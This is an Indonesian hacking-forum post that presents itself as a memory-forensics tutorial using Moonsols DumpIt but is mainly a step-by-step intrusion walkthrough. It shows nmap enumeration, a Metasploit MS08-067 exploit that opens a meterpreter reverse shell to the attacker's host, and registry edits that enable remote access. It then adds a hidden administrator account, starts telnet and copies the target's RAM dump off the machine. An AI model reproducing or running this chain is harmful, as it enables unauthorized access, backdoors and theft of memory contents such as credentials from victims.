-=Explore The World From Our Binary=-
 
HomeIndeksPendaftaranLogin

Share | 
 

 Membuat Live RAW Image Random Access Memory (RAM) Pada Mesin Target Windows

Topik sebelumnya Topik selanjutnya Go down 
PengirimMessage
Voldemort
BC Security
BC Security
avatar

Jumlah posting : 331
Points : 725
Reputation : 16
Join date : 04.07.11

PostSubyek: Membuat Live RAW Image Random Access Memory (RAM) Pada Mesin Target Windows   Sun Feb 26, 2012 1:22 am

pernah ada yang bayangin gak? di film film kita sering liat ada geng geng teroris hi tech, menggunakan flashdisk nyolokkin flashdisk di komputer target, lalu dengan cepatnya keluar dari TKP, dan menganalisa “file-entah-apa” yang di dump ke flashdisk tersebut di suatu tempat tersembunyi.
actually gw pernah membayangkan dan mencoba bagaimana sih seperti itu, dan apalagi gw ini bukan teroris seperti itu.
di security cabang spionase atau undercover seperti ini dengan mudah di pelajari dengan mengambil tahap pertama yaitu forensik, karena dengan melakukan forensik kita terbiasa dengan hal detail, lalu kita bisa hitung timing dan keperluan alat alat untuk melakukan forensik.
pada kali ini kita bahasa forensik Live RAM yang di dump pada satu file RAW, dengan bantuan tools Moonsols DumpIt.
Core Dumping / Memory Dumping / Storage Dumping adalah tekhnik untuk debugging sistem operasi secara offline, tanpa mengganggu kinerja sistem yang sedang berjalan, tipe dumping bisa bermacam macam, ada yang crash dumping, storage dumping dll.
So ini menjadi salah satu teknik forensik, di bidang security, dimana jika seseorang attacker ingin menganalisa sistem operasi target namun tidak mempunyai waktu yang cukup, maka core dumping biasa dilakukan untuk menganalisa sistem operasi yang sedang berjalan pada target di tempat lain.
Moonsols DumpIt
This utility is used to generate a physical memory dump of Windows machines. It works with both x86 (32-bits) and x64 (64-bits) machines.
The raw memory dump is generated in the current directory, only a confirmation question is prompted before starting.
Perfect to deploy the executable on USB keys, for quick incident responses needs.
seperti yang ditulis msuiche pada blog moonsols, DumpIt di release karena banyaknya yang melakukan forensik pada memory windows terbatas pada tools yang tersedia di publik, beda nya executable setiap arsitektur processor, serta tidak ada yang praktis.

[You must be registered and logged in to see this image.]

DumpIt hanya satu file aplikasi executable, tanpa .ini atau file pendukung lainya, penggunaan nya hanya 1 click lalu hanya ada satu konfirmasi, yaitu yes (y) atau tidak (n).

[You must be registered and logged in to see this image.]

begitu yes maka DumpIt akan melakukan dumping live RAM Memory ke dalam satu file, dalam direktori DumpIt.exe itu sendiri, sehingga DumpIt sangat cocok untuk ditaruh ke dalam USB Flashdisk Kosong.
besar file yang di dump adalah besar dari exact memory size, dimana jika RAM target sebesar 4GB, maka DumpIt akan membuat file dumping sebesar 4GB.
ada dua skenario attack pada kasus dumping memory untuk forensik, ialah :
Attacker membawa DumpIt ke satu flashdisk kosong, lalu bertemu dengan target, meminjam komputer windows tersebut, lalu mendumping live RAM Memory si target, Attacker mendapatkan file RAW dari Live RAM memori target lalu menganalisa nya di rumah.
Attacker melakukan penetrasi dari local network dengan metasploit, dengan cara cara :


# Enumeration

01
msf > ping -c 1 192.168.1.106
02
[*] exec: ping -c 1 192.168.1.106
03

04
PING 192.168.1.106 (192.168.1.106) 56(84) bytes of data.
05
64 bytes from 192.168.1.106: icmp_seq=1 ttl=128 time=114 ms
06

07
msf > nmap -p 445 192.168.1.106
08
[*] exec: nmap -p 445 192.168.1.106
09

10
Starting Nmap 5.61TEST4 ( [You must be registered and logged in to see this link.] ) at 2012-02-06 11:09 WIT
11
Nmap scan report for 192.168.1.106
12
Host is up (0.00098s latency).
13
PORT STATE SERVICE
14
445/tcp open microsoft-ds
15
MAC Address: 08:00:27:15:05:2E (Cadmus Computer Systems)
16

17
Nmap done: 1 IP address (1 host up) scanned in 0.41 seconds
# Penetration
01
msf > use exploit/windows/smb/ms08_067_netapi
02
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
03
PAYLOAD => windows/meterpreter/reverse_tcp
04
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.106
05
RHOST => 192.168.1.106
06
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.109
07
LHOST => 192.168.1.109
08
msf exploit(ms08_067_netapi) > exploit -f
09

10
[*] Started reverse handler on 192.168.1.109:4444
11
[*] Automatically detecting the target...
12
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
13
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
14
[*] Attempting to trigger the vulnerability...
15
[*] Sending stage (752128 bytes) to 192.168.1.106
16
[*] Meterpreter session 1 opened (192.168.1.109:4444 -> 192.168.1.106:1033) at 2012-02-06 08:26:21 +0700
# Upload DumpIt.exe
1
meterpreter > upload /root/gw/gear0wn/DumpIt/DumpIt.exe C:\
# Preparing service backdoor
1
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
2
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
# Set registry new value
1
meterpreter > reg setval -k 'HKLM\system\CurrentControlSet\Control\Terminal Server\' -v AllowTSConnections -t REG_DWORD -d 1
2
meterpreter > reg setval -k 'HKLM\system\CurrentControlSet\Control\Terminal Server\' -v fDenyTSConnections -t REG_DWORD -d 0
# Check registry value
1
meterpreter > reg queryval -k 'HKLM\system\CurrentControlSet\Control\Terminal Server\' -v AllowTSConnections
2
meterpreter > reg queryval -k 'HKLM\system\CurrentControlSet\Control\Terminal Server\' -v fDenyTSConnections
# Restart telnet server
01
meterpreter > execute -f cmd.exe -i
02
Process 4004 created.
03
Channel 2 created.
04
Microsoft Windows XP [Version 5.1.2600]
05
(C) Copyright 1985-2001 Microsoft Corp.
06

07
C:\WINDOWS\system32>net user
08
net user
09

10
User accounts for \\ANONYMOUS
11

12
-------------------------------------------------------------------------------
13
Administrator Guest HelpAssistant
14
idiot SUPPORT_388945a0
15
The command completed successfully.
16

17
C:\WINDOWS\system32>
18

19
C:\Windows\system32\>tlntsvr.exe start
20
C:\Windows\system32\>net user gxrg let_us_in /add
21
C:\Windows\system32\>net localgroup Administrators gxrg /add
22
C:\Windows\system32\>sc config TermService start= auto
23
C:\Windows\system32\>net start Termservice
24
C:\Windows\system32\>sc config tlntsvr start= auto
25
C:\Windows\system32\>net start tlntsvr


Running Telnet ke mesin target, login sesuai user yang telah baru dibuat, lalu jalankan DumpIt, dan pencet y, lalu enter, tunggu beberapa saat, file raw akan dibuat, dan copy ke mesin attacker RAW tersebut, lalu delete user yang telah dibuat, dan logout meterpreter dengan smoothly :).
*dibutuhkan Telnet Server karena, NC dan default shell windows pada meterpreter suck tidak bisa menjalankan DumpIt, dikarenakan interface kedua tools tsb.
Artikel lanjutan dari ini akan ditulis, yaitu analisa forensik RAW Memory dari hasil Dumping.
Good Luck! ;p.
Kembali Ke Atas Go down
digitalcat
BC Security
BC Security
avatar

Jumlah posting : 451
Points : 710
Reputation : 28
Join date : 31.10.11
Age : 35

PostSubyek: Re: Membuat Live RAW Image Random Access Memory (RAM) Pada Mesin Target Windows   Sun Feb 26, 2012 7:20 am

Mantep bro
Kembali Ke Atas Go down
 
Membuat Live RAW Image Random Access Memory (RAM) Pada Mesin Target Windows
Topik sebelumnya Topik selanjutnya Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» Hal-Hal yang dapat membuat kaum lelaki menangis
» [Tutorial] Cara membuat forum forumotion
» Cara membuat pendataan&list list barang menjadi seperti di sini?
» #WTA Armor anime Date a live
» (bagaimana) cara membuat peringatan di chatbox?

Permissions in this forum:Anda tidak dapat menjawab topik
.:: Blackc0de Forum ::. :: Information Technology :: Security-
Navigasi: